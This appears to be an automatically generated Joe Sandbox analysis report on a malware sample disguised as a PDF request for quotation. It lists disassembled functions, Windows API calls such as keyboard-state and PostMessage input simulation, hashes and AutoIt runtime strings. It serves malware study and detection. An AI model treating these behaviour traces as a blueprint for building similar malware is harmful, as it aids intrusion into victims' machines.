                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 2931989736-0
                                                                                                                • Opcode ID: 2167746000c10720150e42974f4bb398973372da6b5a100ab16b1c48837c8268
                                                                                                                • Instruction ID: e18202846b17244453a92e8db3e82df8eaab35a25a6ffd554f610fc9ca88f7b3
                                                                                                                • Opcode Fuzzy Hash: 2167746000c10720150e42974f4bb398973372da6b5a100ab16b1c48837c8268
                                                                                                                • Instruction Fuzzy Hash: 2C218071E40A09BB925856318F82FBB337CAE22385B4C4821FD179B7C1F721ED2081A9
                                                                                                                Function 00AC4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                • API String ID: 0-572801152
                                                                                                                • Opcode ID: 15cfa9dbdbb98c3ba72c16cd7d4704f77b015e1fe135f4f64bacd0343568400e
                                                                                                                • Instruction ID: d827d06316cdd25e975ec157d1a0e3c219b168f412f9523884f78d7a778e7fbf
                                                                                                                • Opcode Fuzzy Hash: 15cfa9dbdbb98c3ba72c16cd7d4704f77b015e1fe135f4f64bacd0343568400e
                                                                                                                • Instruction Fuzzy Hash: 8CD18D71E0060AAFDF10DFA8C894FAEB7B5BB48344F158169F915AB281D770A981CB90
                                                                                                                Function 00A81522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00A817FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00A815CE
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A81651
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A817FB,?,00A817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A816E4
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A816FB
                                                                                                                  • Part of subcall function 00A73820: RtlAllocateHeap.NTDLL(00000000,?,00B11444,?,00A5FDF5,?,?,00A4A976,00000010,00B11440,00A413FC,?,00A413C6,?,00A41129), ref: 00A73852
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00A817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A81777
                                                                                                                • __freea.LIBCMT ref: 00A817A2
                                                                                                                • __freea.LIBCMT ref: 00A817AE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 2829977744-0
                                                                                                                • Opcode ID: 2c9d41e9873ea4cdb9062072aaa478f67eccb7efdbcdfe227cf9e0cf722a6894
                                                                                                                • Instruction ID: c7f7f6fcd47ad45684bc24e10765ba81e0deea518ddcd0ace36b954da88c2755
                                                                                                                • Opcode Fuzzy Hash: 2c9d41e9873ea4cdb9062072aaa478f67eccb7efdbcdfe227cf9e0cf722a6894
                                                                                                                • Instruction Fuzzy Hash: B291B471E002169EDF24AF64CD81AEEBBBDAF49350F184669E806E7141EB35DD42CB60
                                                                                                                Function 00AC4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit
                                                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                • API String ID: 2610073882-625585964
                                                                                                                • Opcode ID: cb20dd5a46a69d43429332dc29ef48be278bb1e831c68b564f42b862f1886482
                                                                                                                • Instruction ID: 32e296f89b0f5707a1f26a1a4e683c2c5d46de09c2c7610a6d3eb5a45ee99c7d
                                                                                                                • Opcode Fuzzy Hash: cb20dd5a46a69d43429332dc29ef48be278bb1e831c68b564f42b862f1886482
                                                                                                                • Instruction Fuzzy Hash: 20919171A00219AFDF20CFA4C858FAEBBB8EF4A714F11855DF515AB280D7709945CFA4
                                                                                                                Function 00AB1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00AB125C
                                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AB1284
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00AB12A8
                                                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00AB12D8
                                                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00AB135F
                                                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00AB13C4
                                                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00AB1430
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                • String ID:
                                                                                                                • API String ID: 2550207440-0
                                                                                                                • Opcode ID: 066cebe1f2082fa05aa1384320dc63a53c1135f9f13298fc69839a52d4bf647f
                                                                                                                • Instruction ID: af3361ba78f9f6e8bbb2340621e5816c341c2d40d9eb1e30d4adcf7f711972df
                                                                                                                • Opcode Fuzzy Hash: 066cebe1f2082fa05aa1384320dc63a53c1135f9f13298fc69839a52d4bf647f
                                                                                                                • Instruction Fuzzy Hash: CE9116B6A00219AFDB00DF98C8A4BFE77B9FF45325F504029E911EB292D774E941CB90
                                                                                                                Function 00A5948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 3225163088-0
                                                                                                                • Opcode ID: 38f213b1bc091827b325387f88b6f8686ca0f07ed0152675a62e5b95767c2adc
                                                                                                                • Instruction ID: f26d8691629ff3535a40ca02f39f6bc0ea20cc913dbcc8da4006dbf046b42798
                                                                                                                • Opcode Fuzzy Hash: 38f213b1bc091827b325387f88b6f8686ca0f07ed0152675a62e5b95767c2adc
                                                                                                                • Instruction Fuzzy Hash: 64913871E40219EFCB10CFA9CC84AEEBBB8FF49321F148155E915BB251D378A956CB60
                                                                                                                Function 00AC3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00AC396B
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00AC3A7A
                                                                                                                • _wcslen.LIBCMT ref: 00AC3A8A
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AC3C1F
                                                                                                                  • Part of subcall function 00AB0CDF: VariantInit.OLEAUT32(00000000), ref: 00AB0D1F
                                                                                                                  • Part of subcall function 00AB0CDF: VariantCopy.OLEAUT32(?,?), ref: 00AB0D28
                                                                                                                  • Part of subcall function 00AB0CDF: VariantClear.OLEAUT32(?), ref: 00AB0D34
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                • API String ID: 4137639002-1221869570
                                                                                                                • Opcode ID: c360831f0316df805c98859cc7ce55096fc57b83bf03fc5de83e7051353c6772
                                                                                                                • Instruction ID: cae4619a90a1d816f8ec54bcd2205876bde834cf22db585b49c86bb3895fb6f2
                                                                                                                • Opcode Fuzzy Hash: c360831f0316df805c98859cc7ce55096fc57b83bf03fc5de83e7051353c6772
                                                                                                                • Instruction Fuzzy Hash: D39159766083019FCB04DF28C580A6AB7E4FF89314F14896DF88A9B351DB31EE05CB92
                                                                                                                Function 00AC4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?,?,?,00AA035E), ref: 00AA002B
                                                                                                                  • Part of subcall function 00AA000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?,?), ref: 00AA0046
                                                                                                                  • Part of subcall function 00AA000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?,?), ref: 00AA0054
                                                                                                                  • Part of subcall function 00AA000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?), ref: 00AA0064
                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00AC4C51
                                                                                                                • _wcslen.LIBCMT ref: 00AC4D59
                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00AC4DCF
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 00AC4DDA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                • API String ID: 614568839-2785691316
                                                                                                                • Opcode ID: b4d948b3c3052b79c2ff74ab6be40f27302790c5cdd54cbfc7f48740f3c76f37
                                                                                                                • Instruction ID: e9560645dcd4a62331d692cdb8e9ff0637f23f67905858aa967b8c71e0b24df2
                                                                                                                • Opcode Fuzzy Hash: b4d948b3c3052b79c2ff74ab6be40f27302790c5cdd54cbfc7f48740f3c76f37
                                                                                                                • Instruction Fuzzy Hash: 00912771D0021DAFDF11DFA4C891EEEB7B8BF48310F11816AE916A7291EB309A45CF60
                                                                                                                Function 00AD20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMenu.USER32(?), ref: 00AD2183
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 00AD21B5
                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AD21DD
                                                                                                                • _wcslen.LIBCMT ref: 00AD2213
                                                                                                                • GetMenuItemID.USER32(?,?), ref: 00AD224D
                                                                                                                • GetSubMenu.USER32(?,?), ref: 00AD225B
                                                                                                                  • Part of subcall function 00AA3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AA3A57
                                                                                                                  • Part of subcall function 00AA3A3D: GetCurrentThreadId.KERNEL32 ref: 00AA3A5E
                                                                                                                  • Part of subcall function 00AA3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AA25B3), ref: 00AA3A65
                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AD22E3
                                                                                                                  • Part of subcall function 00AAE97B: Sleep.KERNEL32 ref: 00AAE9F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4196846111-0
                                                                                                                • Opcode ID: a17e54feec161c028a648cc778cd9a3bfb11ef313cb67d8e960cd4b01c928c0b
                                                                                                                • Instruction ID: e608e07a73a4993c35389ea237993461353defddf62ec59a31874bbe55feae26
                                                                                                                • Opcode Fuzzy Hash: a17e54feec161c028a648cc778cd9a3bfb11ef313cb67d8e960cd4b01c928c0b
                                                                                                                • Instruction Fuzzy Hash: B8716B75A00215AFCB10DFA4C985BAEB7F5EF98320F14845AF816AB351DB35EE41CB90
                                                                                                                Function 00AD7E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(01165940), ref: 00AD7F37
                                                                                                                • IsWindowEnabled.USER32(01165940), ref: 00AD7F43
                                                                                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00AD801E
                                                                                                                • SendMessageW.USER32(01165940,000000B0,?,?), ref: 00AD8051
                                                                                                                • IsDlgButtonChecked.USER32(?,?), ref: 00AD8089
                                                                                                                • GetWindowLongW.USER32(01165940,000000EC), ref: 00AD80AB
                                                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00AD80C3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                • String ID:
                                                                                                                • API String ID: 4072528602-0
                                                                                                                • Opcode ID: 8d7449f94eddfbf8dfbcef5904b3fa76bd91c18967ac1161fb12eeb155b7417c
                                                                                                                • Instruction ID: bcc8dc42ca2a052fd154cf097cbc287ed1cfa98f59dfff182b0ef6fc952b39ea
                                                                                                                • Opcode Fuzzy Hash: 8d7449f94eddfbf8dfbcef5904b3fa76bd91c18967ac1161fb12eeb155b7417c
                                                                                                                • Instruction Fuzzy Hash: 90718A34609204AFEB39DF64C884FAEBBB9EF09310F54445BE957973A1DB31A845CB10
                                                                                                                Function 00AAAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 00AAAEF9
                                                                                                                • GetKeyboardState.USER32(?), ref: 00AAAF0E
                                                                                                                • SetKeyboardState.USER32(?), ref: 00AAAF6F
                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00AAAF9D
                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00AAAFBC
                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00AAAFFD
                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AAB020
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                • Opcode ID: c9f559b3c556b01fa8fcb4a1c2cba2b6a095c756c37e0e2f5f52af9e4ccd93f2
                                                                                                                • Instruction ID: c0eff410bad365c701adb6965c70ff19134d7f03ec498b8930d9475e511abb25
                                                                                                                • Opcode Fuzzy Hash: c9f559b3c556b01fa8fcb4a1c2cba2b6a095c756c37e0e2f5f52af9e4ccd93f2
                                                                                                                • Instruction Fuzzy Hash: B551AFA06147D53DFB3A8334CC45BBABEE95B17304F08858AE1D9568C3D399ACC8D761
                                                                                                                Function 00AAACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32(00000000), ref: 00AAAD19
                                                                                                                • GetKeyboardState.USER32(?), ref: 00AAAD2E
                                                                                                                • SetKeyboardState.USER32(?), ref: 00AAAD8F
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AAADBB
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AAADD8
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AAAE17
                                                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AAAE38
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                • Opcode ID: e01d8290b1560021ea43ef7757f25edc8f3b0e5b917f9449911c02e059d4a616
                                                                                                                • Instruction ID: 0010aa72f256d11ae3299ef8686535ba1072495fc1ed177a1c43cafa7816e38c
                                                                                                                • Opcode Fuzzy Hash: e01d8290b1560021ea43ef7757f25edc8f3b0e5b917f9449911c02e059d4a616
                                                                                                                • Instruction Fuzzy Hash: 1F51B2A16047E53DFB3783248C55BBABEE95B57300F088589E1D5578C2D394EC88E762
                                                                                                                Function 00A7542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetConsoleCP.KERNEL32(00A83CD6,?,?,?,?,?,?,?,?,00A75BA3,?,?,00A83CD6,?,?), ref: 00A75470
                                                                                                                • __fassign.LIBCMT ref: 00A754EB
                                                                                                                • __fassign.LIBCMT ref: 00A75506
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00A83CD6,00000005,00000000,00000000), ref: 00A7552C
                                                                                                                • WriteFile.KERNEL32(?,00A83CD6,00000000,00A75BA3,00000000,?,?,?,?,?,?,?,?,?,00A75BA3,?), ref: 00A7554B
                                                                                                                • WriteFile.KERNEL32(?,?,00000001,00A75BA3,00000000,?,?,?,?,?,?,?,?,?,00A75BA3,?), ref: 00A75584
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 1324828854-0
